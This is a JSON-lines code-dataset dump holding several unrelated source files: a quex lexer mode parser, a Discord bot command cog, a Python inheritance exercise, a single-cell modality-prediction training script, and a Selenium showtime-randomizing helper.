error_msg(\"Mode without pattern and event handlers needs to be 'inheritable only'.\\n\" + \\\n \" has been added automatically.\", fh, DontExitF=True)\n\ndef finalize():\n \"\"\"After all modes have been defined, the mode descriptions can now\n be translated into 'real' modes.\n \"\"\"\n global mode_description_db\n\n # (*) Translate each mode description int a 'real' mode\n for name, mode_descr in mode_description_db.iteritems():\n blackboard.mode_db[name] = Mode(mode_descr)\n\n # (*) perform consistency check \n consistency_check.do(blackboard.mode_db)\n\ndef __parse_option_list(new_mode, fh):\n position = fh.tell()\n try: \n # ':' => inherited modes/options follow\n skip_whitespace(fh)\n\n __parse_base_mode_list(fh, new_mode)\n \n while __parse_option(fh, new_mode):\n pass\n\n except EndOfStreamException:\n fh.seek(position)\n error_msg(\"End of file reached while parsing options of mode '%s'.\" % new_mode.name, fh)\n\ndef __parse_base_mode_list(fh, new_mode):\n new_mode.base_modes = []\n trailing_comma_f = False\n while 1 + 1 == 2:\n if check(fh, \"{\"): fh.seek(-1, 1); break\n elif check(fh, \"<\"): fh.seek(-1, 1); break\n\n skip_whitespace(fh)\n identifier = read_identifier(fh)\n if identifier == \"\": break\n\n new_mode.base_modes.append(identifier)\n trailing_comma_f = False\n if not check(fh, \",\"): break\n trailing_comma_f = True\n\n\n if trailing_comma_f:\n error_msg(\"Trailing ',' after base mode '%s'.\" % new_mode.base_modes[-1], fh, \n DontExitF=True, WarningF=True)\n \n elif len(new_mode.base_modes) != 0:\n # This check is a 'service' -- for those who follow the old convention\n pos = fh.tell()\n skip_whitespace(fh)\n dummy_identifier = read_identifier(fh)\n if dummy_identifier != \"\":\n error_msg(\"Missing separating ',' between base modes '%s' and '%s'.\\n\" \\\n % (new_mode.base_modes[-1], dummy_identifier) + \\\n \"(The comma separator is mandatory since quex 0.53.1)\", fh)\n fh.seek(pos)\n\ndef __parse_string(fh, Name):\n pos = fh.tell()\n if fh.read(1) != \"\\\"\":\n pos = fh.tell()\n msg = fh.read(5)\n fh.seek(pos)\n error_msg(\"%s can\\n\" % Name + \n \"only be a string and must start with a quote like \\\".\\n\" +\n \"Found '%s'\" % msg, fh)\n\n sequence = snap_character_string.get_character_code_sequence(fh)\n end_pos = fh.tell()\n fh.seek(pos)\n msg = fh.read(end_pos - pos)\n return msg, sequence\n\ndef __parse_option(fh, new_mode):\n def get_pattern_object(SM):\n if not SM.is_DFA_compliant(): result = nfa_to_dfa.do(SM)\n else: result = SM\n result = hopcroft.do(result, CreateNewStateMachineF=False)\n return Pattern(result, AllowStateMachineTrafoF=True)\n\n identifier = read_option_start(fh)\n if identifier is None: return False\n\n verify_word_in_list(identifier, mode_option_info_db.keys(),\n \"mode option\", fh.name, get_current_line_info_number(fh))\n\n if identifier == \"skip\":\n # A skipper 'eats' characters at the beginning of a pattern that belong\n # to a specified set of characters. A useful application is most probably\n # the whitespace skipper '[ \\t\\n]'. The skipper definition allows quex to\n # implement a very effective way to skip these regions.\n pattern_str, trigger_set = regular_expression.parse_character_set(fh, PatternStringF=True)\n skip_whitespace(fh)\n\n if fh.read(1) != \">\":\n error_msg(\"missing closing '>' for mode option '%s'.\" % identifier, fh)\n\n if trigger_set.is_empty():\n error_msg(\"Empty trigger set for skipper.\" % identifier, fh)\n\n # TriggerSet skipping is implemented the following way: As soon as one element of the \n # trigger set appears, the state machine enters the 'trigger set skipper section'.\n # Enter the skipper as if the opener pattern was a normal pattern and the 'skipper' is the action.\n # NOTE: The correspondent CodeFragment for skipping is created in 'implement_skippers(...)'\n pattern_sm = StateMachine()\n pattern_sm.add_transition(pattern_sm.init_state_index, trigger_set, AcceptanceF=True)\n\n # Skipper code is to be generated later\n action = GeneratedCode(skip_character_set.do, \n FileName = fh.name, \n LineN = get_current_line_info_number(fh))\n action.data[\"character_set\"] = trigger_set\n\n new_mode.add_match(pattern_str, action, get_pattern_object(pattern_sm), \n Comment=E_SpecialPatterns.SKIP)\n\n return True\n\n elif identifier in [\"skip_range\", \"skip_nested_range\"]:\n # A non-nesting skipper can contain a full fledged regular expression as opener,\n # since it only effects the trigger. Not so the nested range skipper-see below.\n\n # -- opener\n skip_whitespace(fh)\n if identifier == \"skip_nested_range\":\n # Nested range state machines only accept 'strings' not state machines\n opener_str, opener_sequence = __parse_string(fh, \"Opener pattern for 'skip_nested_range'\")\n opener_sm = StateMachine.from_sequence(opener_sequence)\n else:\n opener_str, opener_pattern = regular_expression.parse(fh)\n opener_sm = opener_pattern.sm\n # For 'range skipping' the opener sequence is not needed, only the opener state\n # machine is webbed into the pattern matching state machine.\n opener_sequence = None\n\n skip_whitespace(fh)\n\n # -- closer\n closer_str, closer_sequence = __parse_string(fh, \"Closing pattern for 'skip_range' or 'skip_nested_range'\")\n skip_whitespace(fh)\n if fh.read(1) != \">\":\n error_msg(\"missing closing '>' for mode option '%s'\" % identifier, fh)\n\n # Skipper code is to be generated later\n generator_function, comment = { \n \"skip_range\": (skip_range.do, E_SpecialPatterns.SKIP_RANGE),\n \"skip_nested_range\": (skip_nested_range.do, E_SpecialPatterns.SKIP_NESTED_RANGE),\n }[identifier]\n action = GeneratedCode(generator_function,\n FileName = fh.name, \n LineN = get_current_line_info_number(fh))\n\n action.data[\"opener_sequence\"] = opener_sequence\n action.data[\"closer_sequence\"] = closer_sequence\n action.data[\"mode_name\"] = new_mode.name\n\n new_mode.add_match(opener_str, action, get_pattern_object(opener_sm), Comment=comment)\n\n return True\n \n elif identifier == \"indentation\":\n value = indentation_setup.do(fh)\n\n # Enter 'Newline' and 'Suppressed Newline' as matches into the engine.\n # Similar to skippers, the indentation count is then triggered by the newline.\n # -- Suppressed Newline = Suppressor followed by Newline,\n # then newline does not trigger indentation counting.\n suppressed_newline_pattern_str = \"\"\n if value.newline_suppressor_state_machine.get() is not None:\n suppressed_newline_pattern_str = \\\n \"(\" + value.newline_suppressor_state_machine.pattern_string() + \")\" \\\n + \"(\" + value.newline_state_machine.pattern_string() + \")\"\n \n suppressed_newline_sm = \\\n sequentialize.do([value.newline_suppressor_state_machine.get(),\n value.newline_state_machine.get()])\n \n FileName = value.newline_suppressor_state_machine.file_name\n LineN = value.newline_suppressor_state_machine.line_n\n # Go back to start.\n code = UserCodeFragment(\"goto %s;\" % get_label(\"$start\", U=True), FileName, LineN)\n\n new_mode.add_match(suppressed_newline_pattern_str, code, \n get_pattern_object(suppressed_newline_sm),\n Comment=E_SpecialPatterns.SUPPRESSED_INDENTATION_NEWLINE)\n\n # When there is an empty line, then there shall be no indentation count on it.\n # Here comes the trick: \n #\n # Let newline \n # be defined as: newline ([space]* newline])*\n # \n # This way empty lines are eating away before the indentation count is activated.\n\n # -- 'space'\n x0 = StateMachine()\n x0.add_transition(x0.init_state_index, value.indentation_count_character_set(), \n AcceptanceF=True)\n # -- '[space]*'\n x1 = repeat.do(x0)\n # -- '[space]* newline'\n x2 = sequentialize.do([x1, value.newline_state_machine.get()])\n # -- '([space]* newline)*'\n x3 = repeat.do(x2)\n # -- 'newline ([space]* newline)*'\n x4 = sequentialize.do([value.newline_state_machine.get(), x3])\n # -- nfa to dfa; hopcroft optimization\n sm = beautifier.do(x4)\n\n FileName = value.newline_state_machine.file_name\n LineN = value.newline_state_machine.line_n\n action = GeneratedCode(indentation_counter.do, FileName, LineN)\n\n action.data[\"indentation_setup\"] = value\n\n new_mode.add_match(value.newline_state_machine.pattern_string(), action, \n get_pattern_object(sm), \n Comment=E_SpecialPatterns.INDENTATION_NEWLINE)\n\n # Announce the mode to which the setup belongs\n value.set_containing_mode_name(new_mode.name)\n else:\n value = read_option_value(fh)\n\n # The 'verify_word_in_list()' call must have ensured that the following holds\n assert mode_option_info_db.has_key(identifier)\n\n # Is the option of the appropriate value?\n option_info = mode_option_info_db[identifier]\n if option_info.domain is not None and value not in option_info.domain:\n error_msg(\"Tried to set value '%s' for option '%s'. \" % (value, identifier) + \\\n \"Though, possible for this option are only: %s.\" % repr(option_info.domain)[1:-1], fh)\n\n # Finally, set the option\n new_mode.add_option(identifier, value)\n\n return True\n\ndef __parse_element(new_mode, fh):\n \"\"\"Returns: False, if a closing '}' has been found.\n True, else.\n \"\"\"\n position = fh.tell()\n try:\n description = \"Pattern or event handler name.\\n\" + \\\n \"Missing closing '}' for end of mode\"\n\n skip_whitespace(fh)\n # NOTE: Do not use 'read_word' since we need to continue directly after\n # whitespace, if a regular expression is to be parsed.\n position = fh.tell()\n\n word = read_until_whitespace(fh)\n if word == \"}\": return False\n\n # -- check for 'on_entry', 'on_exit', ...\n if __parse_event(new_mode, fh, word): return True\n\n fh.seek(position)\n description = \"Start of mode element: regular expression\"\n pattern_str, pattern = regular_expression.parse(fh)\n\n if new_mode.has_pattern(pattern_str):\n previous = new_mode.get_pattern_action_pair(pattern_str)\n error_msg(\"Pattern has been defined twice.\", fh, DontExitF=True)\n error_msg(\"First defined here.\", \n previous.action().filename, previous.action().line_n)\n\n position = fh.tell()\n description = \"Start of mode element: code fragment for '%s'\" % pattern_str\n\n __parse_action(new_mode, fh, pattern_str, pattern)\n\n except EndOfStreamException:\n fh.seek(position)\n error_msg(\"End of file reached while parsing %s.\" % description, fh)\n\n return True\n\ndef __parse_action(new_mode, fh, pattern_str, pattern):\n\n position = fh.tell()\n try:\n skip_whitespace(fh)\n position = fh.tell()\n \n code_obj = code_fragment.parse(fh, \"regular expression\", ErrorOnFailureF=False) \n if code_obj is not None:\n new_mode.add_match(pattern_str, code_obj, pattern)\n return\n\n fh.seek(position)\n word = read_until_letter(fh, [\";\"])\n if word == \"PRIORITY-MARK\":\n # This mark 'lowers' the priority of a pattern to the priority of the current\n # pattern index (important for inherited patterns, that have higher precedence).\n # The parser already constructed a state machine for the pattern that is to\n # be assigned a new priority. Since, this machine is not used, let us just\n # use its id.\n fh.seek(-1, 1)\n check_or_die(fh, \";\", \". Since quex version 0.33.5 this is required.\")\n new_mode.add_match_priority(pattern_str, pattern, pattern.sm.get_id(), \n fh.name, get_current_line_info_number(fh))\n\n elif word == \"DELETION\":\n # This mark deletes any pattern that was inherited with the same 'name'\n fh.seek(-1, 1)\n check_or_die(fh, \";\", \". Since quex version 0.33.5 this is required.\")\n new_mode.add_match_deletion(pattern_str, pattern, fh.name, get_current_line_info_number(fh))\n \n else:\n error_msg(\"Missing token '{', 'PRIORITY-MARK', 'DELETION', or '=>' after '%s'.\\n\" % pattern_str + \\\n \"found: '%s'. Note, that since quex version 0.33.5 it is required to add a ';'\\n\" % word + \\\n \"to the commands PRIORITY-MARK and DELETION.\", fh)\n\n\n except EndOfStreamException:\n fh.seek(position)\n error_msg(\"End of file reached while parsing action code for pattern.\", fh)\n\ndef __parse_event(new_mode, fh, word):\n pos = fh.tell()\n\n # Allow '<>' and '<>' out of respect for classical tools like 'lex'\n if word == \"<>\": word = \"on_end_of_stream\"\n elif word == \"<>\": word = \"on_failure\"\n elif word in blackboard.all_section_title_list:\n error_msg(\"Pattern '%s' is a quex section title. Has the closing '}' of mode %s \\n\" % (word, new_mode.name) \\\n + \"been forgotten? Else use quotes, i.e. \\\"%s\\\".\" % word, fh)\n elif len(word) < 3 or word[:3] != \"on_\": return False\n\n comment = \"Unknown event handler '%s'. \\n\" % word + \\\n \"Note, that any pattern starting with 'on_' is considered an event handler.\\n\" + \\\n \"use double quotes to bracket patterns that start with 'on_'.\"\n\n __general_validate(fh, new_mode, word, pos)\n verify_word_in_list(word, event_handler_db.keys(), comment, fh)\n __validate_required_token_policy_queue(word, fh, pos)\n\n continue_f = True\n if word == \"on_end_of_stream\":\n # When a termination token is sent, no other token shall follow. \n # => Enforce return from the analyzer! Do not allow CONTINUE!\n continue_f = False\n\n new_mode.events[word] = code_fragment.parse(fh, \"%s::%s event handler\" % (new_mode.name, word),\n ContinueF=continue_f)\n\n return True\n\ndef __general_validate(fh, Mode, Name, pos):\n if Name == \"on_indentation\":\n fh.seek(pos)\n error_msg(\"Definition of 'on_indentation' is no longer supported since version 0.51.1.\\n\"\n \"Please, use 'on_indent' for the event of an opening indentation, 'on_dedent'\\n\"\n \"for closing indentation, and 'on_nodent' for no change in indentation.\", fh) \n\n\n def error_dedent_and_ndedent(code, A, B):\n filename = \"(unknown)\"\n line_n = \"0\"\n if hasattr(code, \"filename\"): filename = code.filename\n if hasattr(code, \"line_n\"): line_n = code.line_n\n error_msg(\"Indentation event handler '%s' cannot be defined, because\\n\" % A,\n fh, DontExitF=True, WarningF=False)\n error_msg(\"the alternative '%s' has already been defined.\" % B,\n filename, line_n)\n\n if Name == \"on_dedent\" and Mode.events.has_key(\"on_n_dedent\"):\n fh.seek(pos)\n code = Mode.events[\"on_n_dedent\"]\n if code.get_code() != \"\":\n error_dedent_and_ndedent(code, \"on_dedent\", \"on_n_dedent\")\n \n if Name == \"on_n_dedent\" and Mode.events.has_key(\"on_dedent\"):\n fh.seek(pos)\n code = Mode.events[\"on_dedent\"]\n if code.get_code() != \"\":\n error_dedent_and_ndedent(code, \"on_n_dedent\", \"on_dedent\")\n \ndef __validate_required_token_policy_queue(Name, fh, pos):\n \"\"\"Some handlers are better only used with token policy 'queue'.\"\"\"\n\n if Name not in [\"on_entry\", \"on_exit\", \n \"on_indent\", \"on_n_dedent\", \"on_dedent\", \"on_nodent\", \n \"on_indentation_bad\", \"on_indentation_error\", \n \"on_indentation\"]: \n return\n if Setup.token_policy == \"queue\":\n return\n if Setup.warning_disabled_no_token_queue_f:\n return\n\n fh.seek(pos)\n error_msg(\"Using '%s' event handler, while the token queue is disabled.\\n\" % Name + \\\n \"Use '--token-policy queue', so then tokens can be sent safer\\n\" + \\\n \"from inside this event handler. Disable this warning by command\\n\"\n \"line option '--no-warning-on-no-token-queue'.\", fh, DontExitF=True) \n","repo_name":"liancheng/rose","sub_path":"external/quex-0.63.2/quex/input/files/mode.py","file_name":"mode.py","file_ext":"py","file_size_in_byte":45752,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} +{"seq_id":"36234972026","text":"import datetime\nimport logging\n\nfrom sqlalchemy import update\n\nfrom discord import Colour, Embed\nfrom discord.ext.commands import Bot, Cog, command, has_permissions, MissingPermissions\n\nfrom utils.checks import is_admin\nfrom utils.database.db_functions import db_edit, cache_prefixes\nimport utils.database as tables\n\nlog = logging.getLogger('bot.' + __name__)\n\n\nclass SpecialCog(Cog, name='Special'):\n \"\"\"Miscellaneous commands.\"\"\"\n def __init__(self, bot: Bot):\n self.bot = bot\n self.config = self.bot.config\n\n @Cog.listener()\n async def on_guild_join(self, guild):\n code = tables.guild_settings.insert().values()\n data = {\n 'guild_id': guild.id,\n 'prefix': self.config[\"prefix\"]\n }\n await db_edit(code, data)\n tavern_support = self.bot.get_guild(546007130902233088)\n channel = tavern_support.get_channel(573945620482490378)\n await channel.send(f'**{guild.name}** guild has invited the Tavern Bot.')\n\n @Cog.listener()\n async def on_guild_remove(self, guild):\n table = tables.guild_settings\n guild_id = guild.id\n code = table.delete().where(table.c.guild_id == guild_id)\n await db_edit(code)\n tavern_support = self.bot.get_guild(546007130902233088)\n channel = tavern_support.get_channel(573945620482490378)\n await channel.send(f'**{guild.name}** guild has removed the Tavern Bot.')\n\n @command(name='invite')\n async def invite_command(self, ctx):\n \"\"\"Invite the bot to your discord server.\"\"\"\n log.debug('Sending an invite link for the bot to {ctx.guild}.')\n invite_embed = Embed(\n title='Invite link for The Tavern Bot',\n description=self.config['invite'],\n colour=Colour.blurple())\n invite_embed.set_footer(text='Use ;help to get a list of available commands.')\n await ctx.send(embed=invite_embed)\n\n @command(name='status')\n async def status_command(self, ctx):\n \"\"\"Get the current status of the bot.\"\"\"\n status_embed = Embed(\n title='Status',\n colour=Colour.blurple())\n members = len(list(self.bot.get_all_members()))\n uptime = datetime.datetime.now() - self.bot.start_time\n uptime = datetime.timedelta(days=uptime.days, seconds=uptime.seconds)\n date = 'Created on 18-11-2018'\n status_embed.description = '\\n'.join(\n [f'Bot up and running in {len(self.bot.guilds)} guilds with {members} members.',\n f'Uptime: {uptime}\\n{date}'\n ]\n )\n status_embed.set_footer(text='Use ;help to get a list of available commands.')\n await ctx.send(embed=status_embed)\n\n @command(name='basic', aliases=['srd'])\n async def basic_rules(self, ctx):\n \"\"\"Link to the basic rulebook for D&D 5e.\"\"\"\n basic_embed = Embed(\n description='**The basic rules for Dungeons and Dragons can be found at the following link:\\n'\n 'http://media.wizards.com/2018/dnd/downloads/DnD_BasicRules_2018.pdf',\n colour=Colour.blurple())\n basic_embed.set_footer(text='Use ;help to get a list of available commands.')\n await ctx.send(embed=basic_embed)\n\n @is_admin()\n @command(name='dbappend', hidden=True)\n async def append_to_db(self, ctx):\n \"\"\"\n Ensures all guilds that the Bot is currently in are added to the Guilds database..\n \"\"\"\n guilds_added = 0\n db_code = tables.guild_settings.insert().values()\n for g in self.bot.guilds:\n data = {\n 'guild_id': g.id,\n 'prefix': self.config['prefix']\n }\n db_is_edited = await db_edit(db_code, data)\n if db_is_edited:\n guilds_added += 1\n else:\n pass # An error is already passed by the db_edit function\n await ctx.send(f'{guilds_added} guilds added to the Guilds database.')\n\n @has_permissions(manage_server=True)\n @command(name='prefix')\n async def change_prefix(self, ctx, new_prefix):\n \"\"\"Use this command to change the prefix of your bot.\"\"\"\n table = tables.guild_settings\n data = {'prefix': new_prefix}\n db_is_edited = await db_edit(update(table).where(table.c.guild_id == ctx.guild.id).values(), data)\n if db_is_edited:\n await cache_prefixes()\n await ctx.send(f\"Prefix has been changed to {new_prefix}\")\n else:\n await ctx.send(f\"Prefix could not be changed to {new_prefix}\")\n\n @change_prefix.error\n async def on_change_prefix_error(self, ctx, error):\n if isinstance(error, MissingPermissions):\n return await ctx.send(f'Could not change the prefix for the server.\\n{error}')\n\n @command(name='help')\n async def new_help(self, ctx, second_help: str = None):\n \"\"\"\n Show this message\n \"\"\"\n embed = Embed(\n title=':regional_indicator_h: :regional_indicator_e: :regional_indicator_l: :regional_indicator_p: ',\n colour=0x68c290\n )\n cmd_names = [cmd.name for cmd in self.bot.commands]\n cogs = sorted([cog for cog in self.bot.cogs.keys() if cog not in ['Tavern', 'ErrorHandler']])\n if not second_help:\n for cog_name in cogs:\n cog = self.bot.get_cog(cog_name)\n commands = [cmd for cmd in cog.get_commands() if not cmd.hidden]\n message = f'{cog.description}\\nCommands under this category:\\n'\n for cmd in commands:\n message += f'**{self.config[\"prefix\"]}{cmd.name}: ** *{cmd.help[0:40]}...*\\n'\n embed.add_field(name=cog_name, value=message, inline=False)\n embed.add_field(name='Support Server', value='https://discord.gg/UJPzg8x', inline=False)\n embed.set_footer(text=f\"Use {self.config['prefix']}help (category)/(command) for more information.\")\n else:\n cogs_lowercase = [cog.lower() for cog in cogs]\n if second_help in cogs_lowercase:\n index = cogs_lowercase.index(second_help)\n cog = self.bot.get_cog(cogs[index])\n commands = [command for command in cog.get_commands() if command.hidden is not True]\n message = f'{cog.description}\\nCommands under this category:\\n'\n for cmd in commands:\n name = cmd.name\n message += f'**{self.config[\"prefix\"]}{name} :** {cmd.help[0:40]}\\n'\n embed.add_field(name=cogs[index], value=message + '**', inline=False)\n elif second_help.lower() in cmd_names:\n cmd = self.bot.get_command(second_help)\n embed.add_field(name=cmd.name, value=cmd.help, inline=False)\n value = ''\n if cmd.aliases:\n for alias in cmd.aliases:\n value += f'{str(alias)}, '\n value = value[0:-2]\n value = value + '.'\n else:\n value = None\n embed.add_field(name=\"Aliases\", value=f'*{value}*', inline=False)\n params_list = list(cmd.params.keys())\n req_params = []\n for value in params_list:\n req_params.append(value)\n req_params.remove('self')\n req_params.remove('ctx')\n param_message = 'Required parameters are:\\n**'\n if req_params:\n for parm in req_params:\n param_message += parm + '\\n'\n embed.add_field(name='Usage', value=param_message + '**', inline=False)\n else:\n embed.add_field(name='Usage', value=param_message + 'None**', inline=False)\n\n else:\n return await ctx.send(f\"{str(second_help)} command/category does not exist!\")\n await ctx.send(embed=embed)\n\n @is_admin()\n @command(name='hiddencmds', aliases=['hiddens'], hidden=True)\n async def show_hidden_commands(self, ctx):\n \"\"\"View hidden commands.\"\"\"\n embed = Embed(\n title='Hidden Commands',\n description='\\n'.join([f'**{c.name}** - {c.help}' for c in self.bot.commands if c.hidden]),\n colour=0x68c290)\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(SpecialCog(bot))\n log.debug('Loaded')\n","repo_name":"Refisio/rewrite","sub_path":"cogs/specialcog.py","file_name":"specialcog.py","file_ext":"py","file_size_in_byte":8461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"33799131390","text":"#!/usr/bin/python3\n\"\"\"Checks if object is an instance of specified class\"\"\"\n\n\ndef is_kind_of_class(obj, a_class):\n \"\"\"Returns True if object is an instance of specified class, else Flase\"\"\"\n\n if type(obj) is a_class or isinstance(obj, a_class):\n return(True)\n else:\n return(False)\n","repo_name":"CodeSlayer123/holbertonschool-higher_level_programming","sub_path":"0x0A-python-inheritance/3-is_kind_of_class.py","file_name":"3-is_kind_of_class.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35504343818","text":"import argparse\nimport logging\n\nimport anndata as ad\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nimport yaml # type: ignore\nfrom lab_scripts.data import dataloader\nfrom lab_scripts.mains.mp import model as mp_model\nfrom lab_scripts.mains.mp import preprocessing, tune\nfrom lab_scripts.mains.mp.preprocessing import (base_checkpoint_path,\n base_config_path)\nfrom lab_scripts.utils import utils\nfrom pytorch_lightning.callbacks import LearningRateMonitor\nfrom pytorch_lightning.loggers import WandbLogger\nfrom scipy.sparse import csr_matrix\n\nlog = logging.getLogger(\"mp\")\n\n\ndef predict_submission(\n input_train_mod1: ad.AnnData,\n input_train_mod2: ad.AnnData,\n input_test_mod1: ad.AnnData,\n resources_dir: str = \"\",\n) -> ad.AnnData:\n log.info(\"Start MP prediction...\")\n\n # Load data\n mod1 = utils.get_mod(input_train_mod1)\n mod2 = utils.get_mod(input_train_mod2)\n log.info(\"Data is loaded\")\n\n # Select data type\n task_type = utils.get_task_type(mod1, mod2)\n \n predictions = predict(\n input_train_mod1,\n input_train_mod2,\n input_test_mod1,\n task_type,\n resources_dir,\n )\n \n # Convert matrix into csr_matrix (is needed for submission)\n predictions = csr_matrix(predictions)\n\n # Create AnnData object\n result = ad.AnnData(\n X=predictions,\n obs=input_test_mod1.obs,\n var=input_train_mod2.var,\n uns={\"dataset_id\": input_train_mod1.uns[\"dataset_id\"]},\n )\n return result\n\n\ndef predict(\n input_train_mod1: ad.AnnData,\n input_train_mod2: ad.AnnData,\n input_test_mod1: ad.AnnData,\n task_type: str,\n resources_dir,\n):\n config_path = resources_dir + base_config_path + task_type + \".yaml\"\n with open(config_path, \"r\") as f:\n config = yaml.safe_load(f)\n\n model_config = config[\"model\"]\n data_config = config[\"data\"]\n dataset = {\n \"train_mod1\": input_train_mod1,\n \"train_mod2\": input_train_mod2,\n \"test_mod1\": input_test_mod1,\n }\n preprocessed_data = preprocessing.preprocess_data(\n data_config, dataset, mode=\"test\", resources_dir=resources_dir\n )\n\n test_dataloader = preprocessed_data[\"test_dataloader\"]\n second_test_inverse = preprocessed_data[\"second_test_inverse\"]\n\n # Add input feature size\n model_config = preprocessing.update_model_config(config, preprocessed_data)\n log.info(\"Data is preprocessed\")\n\n # Load model\n checkpoint_path = (\n resources_dir + base_checkpoint_path + data_config[\"task_type\"] + \".ckpt\"\n )\n model = mp_model.Predictor.load_from_checkpoint(\n checkpoint_path, config=model_config\n )\n log.info(f\"Model is loaded from {checkpoint_path}\")\n\n model.eval()\n second_pred = []\n with torch.no_grad():\n for i, batch in enumerate(test_dataloader):\n prediction = model.predict_step(batch, i)\n second_pred.append(prediction.cpu())\n second_pred = torch.cat(second_pred, dim=0) # type: ignore\n second_pred = second_test_inverse(second_pred)\n return second_pred # type: ignore\n\n\ndef get_logger(config):\n pl_logger = None\n if config[\"wandb\"]:\n pl_logger = WandbLogger(\n project=\"mp_\" + config[\"data\"][\"task_type\"],\n log_model=False, # type: ignore\n config=config,\n tags=[],\n config_exclude_keys=[\"wandb\"],\n )\n pl_logger.experiment.define_metric(name=\"train_m\", summary=\"min\")\n pl_logger.experiment.define_metric(name=\"test_m\", summary=\"min\")\n return pl_logger\n\n\ndef get_callbacks(\n preprocessed_data: dict, dataset: dict, model_config: dict, logger=None\n):\n small_idx = preprocessed_data[\"small_idx\"]\n train_callback = mp_model.TargetCallback(\n preprocessed_data[\"small_train_dataloader\"],\n preprocessed_data[\"small_train_inverse\"],\n dataset[\"train_mod2\"][small_idx],\n prefix=\"train\",\n )\n callbacks = [train_callback]\n\n if \"val_dataloader\" in preprocessed_data:\n val_callback = mp_model.TargetCallback(\n preprocessed_data[\"val_dataloader\"],\n preprocessed_data[\"second_val_inverse\"],\n dataset[\"val_mod2\"],\n prefix=\"val\",\n )\n callbacks.append(val_callback)\n\n test_callback = mp_model.TargetCallback(\n preprocessed_data[\"test_dataloader\"],\n preprocessed_data[\"second_test_inverse\"],\n dataset[\"test_mod2\"],\n prefix=\"test\",\n )\n callbacks.append(test_callback)\n\n if model_config[\"do_tsne\"]:\n tsne_callback = mp_model.BatchEffectCallback(\n train_dataset=preprocessed_data[\"train_unshuffled_dataloader\"],\n test_dataset=preprocessed_data[\"test_dataloader\"],\n frequency=model_config[\"tsne_frequency\"],\n )\n callbacks.append(tsne_callback)\n\n if logger is not None:\n learning_rate_monitor = LearningRateMonitor(\n logging_interval=\"step\",\n )\n callbacks.append(learning_rate_monitor)\n return callbacks\n\n\ndef train(config: dict):\n # Load data\n data_config = config[\"data\"]\n dataset = dataloader.load_custom_mp_data(\n task_type=data_config[\"task_type\"],\n train_batches=data_config[\"train_batches\"],\n test_batches=data_config[\"test_batches\"],\n val_size=data_config[\"val_size\"],\n )\n log.info(\"Data is loaded\")\n\n # Preprocess data\n preprocessed_data = preprocessing.preprocess_data(\n data_config, dataset, mode=\"train\"\n )\n model_config = preprocessing.update_model_config(config, preprocessed_data)\n if model_config[\"total_correction_batches\"] > 0:\n train_dataloaders = [preprocessed_data[\"train_shuffled_dataloader\"]]\n train_dataloaders.extend(preprocessed_data[\"correction_dataloaders\"])\n else:\n train_dataloaders = preprocessed_data[\"train_shuffled_dataloader\"]\n log.info(\"Data is preprocessed\")\n\n # Configure training\n pl_logger = get_logger(config)\n callbacks = get_callbacks(preprocessed_data, dataset, model_config, pl_logger)\n\n # Train model\n model = mp_model.Predictor(model_config)\n if pl_logger:\n pl_logger.watch(model)\n\n trainer = pl.Trainer(\n gpus=1,\n max_epochs=5000,\n logger=pl_logger,\n callbacks=callbacks,\n deterministic=True,\n checkpoint_callback=False,\n gradient_clip_val=model_config[\"gradient_clip\"]\n if not model_config[\"use_critic\"]\n else 0.0,\n )\n trainer.fit(model, train_dataloaders=train_dataloaders)\n\n # Save model\n checkpoint_path = config.get(\n \"checkpoint_path\", base_checkpoint_path + data_config[\"task_type\"] + \".ckpt\"\n )\n trainer.save_checkpoint(checkpoint_path)\n log.info(f\"Model is saved to {checkpoint_path}\")\n\n if model.use_vi_dropout:\n weights_path = base_checkpoint_path + \"genes.csv\"\n weights = model.vi_dropout.weight.detach().cpu().numpy()\n np.savetxt(weights_path, weights, delimiter=\",\")\n log.info(f\"Genes weights are saved to {weights_path}\")\n\n\ndef get_parser():\n \"\"\"Creates parser.\n\n Remove lines with adding config, if you don't need it.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Modality Prediction\")\n subparsers = parser.add_subparsers(dest=\"action\")\n\n parser_train = subparsers.add_parser(\"train\")\n parser_train.add_argument(\"config\", type=argparse.FileType(\"r\"))\n parser_train.add_argument(\"--wandb\", action=\"store_true\", default=False)\n parser_tune = subparsers.add_parser(\"tune\")\n parser_tune.add_argument(\"config\", type=argparse.FileType(\"r\"))\n return parser\n\n\ndef cli():\n \"\"\"Runs Command-Line Interface.\"\"\"\n parser = get_parser()\n args = parser.parse_args()\n\n # Read yaml config into dict\n config = yaml.safe_load(args.config)\n\n if args.action == \"train\":\n config[\"wandb\"] = args.wandb\n train(config)\n elif args.action == \"tune\":\n tune.tune_hp(config)\n else:\n print(\"Enter command [train, evaluate, tune]\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n utils.set_deafult_seed()\n cli()\n","repo_name":"SteshinSS/NeurIPS2021","sub_path":"lab_scripts/mains/mp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18143543809","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\nfrom random import choice, randint\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport random\n\n\ndef randomizeCC(driver, element): #Randomize the City and Complex\n option = driver.find_element(*element)\n options = option.find_elements(By.TAG_NAME, 'option')[1:]\n final_rand = choice(options).text\n printing = Select(option)\n printing.select_by_visible_text(final_rand)\n return final_rand\n\n\ndef randomizeMH(driver): #Randomize the Movie and Hour\n links = driver.find_elements(By.TAG_NAME, 'time')\n specific_text = 'locationHide'\n filtered_links = []\n\n for link in links:\n divs = link.find_elements(By.XPATH, './ancestor::div')\n divs_with_specific_text = [div for div in divs if specific_text in div.get_attribute('class')]\n\n if not divs_with_specific_text:\n filtered_links.append(link)\n\n if filtered_links:\n random_index = random.randint(0, len(links) - 1)\n selected_link = links[random_index]\n #selected_link.click()\n\n for attempt in range(len(links)):\n try:\n element = WebDriverWait(driver, .1).until(EC.element_to_be_clickable(selected_link))\n element.click()\n break\n\n except Exception as e:\n print(f\"Attempt {attempt + 1}: No clickable button\")\n\n 